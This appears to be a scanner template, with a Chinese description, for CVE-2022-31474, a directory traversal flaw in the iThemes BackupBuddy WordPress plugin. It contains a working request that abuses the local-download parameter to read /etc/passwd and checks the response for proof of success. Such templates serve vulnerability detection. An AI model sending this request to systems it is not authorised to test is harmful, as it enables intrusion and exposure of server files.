漏洞描述
iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。
id: CVE-2022-31474
info:
name: CVE-2022-31474
author: zhizhuo
severity: high
verified: true
description: |
iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
rules:
verify:
request:
method: GET
path: /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=/etc/passwd
expression: response.status == 200 && response.body.bcontains(b'/bin/bash') && response.body.bcontains(b'root')
expression: verify()